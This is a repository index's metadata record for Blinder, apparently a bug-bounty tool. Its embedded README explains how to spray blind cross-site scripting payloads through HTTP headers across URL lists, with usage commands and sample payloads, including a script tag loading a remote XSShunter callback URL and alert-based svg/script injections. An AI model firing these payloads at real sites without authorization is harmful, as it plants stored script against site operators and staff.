{"id":26940026,"url":"https://github.com/demon1a/blinder","last_synced_at":"2025-04-02T15:16:27.581Z","repository":{"id":111172376,"uuid":"306177108","full_name":"DEMON1A/Blinder","owner":"DEMON1A","description":"A script written in python3 to spread blind cross-site scripting payloads on HTTP requests headers","archived":false,"fork":false,"pushed_at":"2022-10-02T02:22:54.000Z","size":42,"stargazers_count":11,"open_issues_count":1,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-11-21T19:38:49.608Z","etag":null,"topics":["automation","blinder","bugbounty","bugbounty-tool","python3","ssti","tool","xss","xsshunter"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/DEMON1A.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-10-22T00:07:08.000Z","updated_at":"2024-10-17T02:32:44.000Z","dependencies_parsed_at":"2023-04-28T07:31:35.897Z","dependency_job_id":null,"html_url":"https://github.com/DEMON1A/Blinder","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DEMON1A%2FBlinder","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DEMON1A%2FBlinder/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DEMON1A%2FBlinder/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DEMON1A%2FBlinder/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/DEMON1A","download_url":"https://codeload.github.com/DEMON1A/Blinder/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246837683,"owners_count":20841903,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["automation","blinder","bugbounty","bugbounty-tool","python3","ssti","tool","xss","xsshunter"],"created_at":"2025-04-02T15:16:26.763Z","updated_at":"2025-04-02T15:16:27.430Z","avatar_url":"https://github.com/DEMON1A.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Blinder\n- A script written in python3 to spread blind cross-site scripting payloads on HTTP requests headers\n\n## Description\n- Blinder is an automation tools written in python3, used to spread sending blind payloads into HTTP servers using XSShunter or custom requests bin, with custom payloads so you can test for more issues like SSTI, CSTI and XSS\n\n![preview](https://i.imgur.com/RugY1vS.png)\n\n### Installation\n```\ngit clone https://github.com/DEMON1A/Blinder\ncd Blinder\npython3 Blinder.py [ARGS]\n```\n\n# How To Use:\n## Basic:\n- That's blinder basic usage example, you just specify XSShunter username using `-u` argument and the URLs file using `-f` argument\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt\n```\n\n## Redirections\n- To disalow/allow redirects on blinder, all you need to-do is use `-r` option with either `deny` or `allow` strings\n\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt -r deny\n```\n## Payloads and multi payloads.\n- In blinder, the default payload we use is `\"\u003e\u003cscript src={xsshunter-url}\u003e\u003c/script\u003e`, But you can always use your own payload using `-p` argument.\n```\npython3 Blinder.py -u hacker -f urls-file.txt -p '\"\u003e\u003cimg src=\"XXX\"\u003e'\n```\n\n- If you wanna use more than one payload, you can seperate them using `,` character for example: `\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e,\"\u003e\u003csvg/onload=alert(1)\u003e`, if your payload requires `,` character and you can't seperate them using that character you can use `-s` option to use another character to-do that\n\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt -p '\u003cimg src=\"XXX\"\u003e,\u003ciframe src=\"XXX\"\u003e'\n```\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt -p '\u003cimg src=\"XXX\"\u003e_\u003ciframe src=\"XXX\"\u003e' -s '_'\n```\n\n- By default, Blinder uses `XXX` as string to replace with the XSShunter/requestbin URL, incase that can't be used with your payload and your payload contains `XSS` inside of it, you can always use `--replace` argument to use another string to replace it with \n\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt -p '\u003cimg src=\"RRR\"\u003e_\u003ciframe src=\"RRR\"\u003e' -s '_' --replace 'RRR'\n```\n\n## Headers\n- By default, Blinder sends the payloads on the `User-agent` header because it's more likely to get stored on web application by requests logs and other stuff, you can use your custom header in case you're testing for a known vulnerability, CVE or anything else\n\n```bash\npython3 Blinder.py -u xsshunter -f urls-file.txt --header Header-name \n```\n\n## Requests bin\n- You can use your own requests bin, burpcollabrator, interactsh or anything else using `-b` argument\n\n```bash\npython3 Blinder.py -b https://request-bin.com/ -f urls-file.txt\n```\n\n### What's New?\n- Threading to improve the tool performance.\n- Added an option allows you to use your own requests bin instead of using XSShunter.\n- Added an option where you can use your own payloads instead of the default one.\n- Added an option to enable/disable redirects on requests\n- Added an option where you can use more than one payload, and choose the splitting character\n- Added an option allows you to use your own custom headers on HTTP requests\n- Added an option allows you to select your own replace word on the payload\n- Cleaner Code!\n\n### Issues:\n- Feel free to open an issue on github issue tracker, I usually respond to such stuff quickly\n- If you need help, you can always find me [@DemoniaSlash](https://twitter.com/DemoniaSlash) \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdemon1a%2Fblinder","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdemon1a%2Fblinder","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdemon1a%2Fblinder/lists"}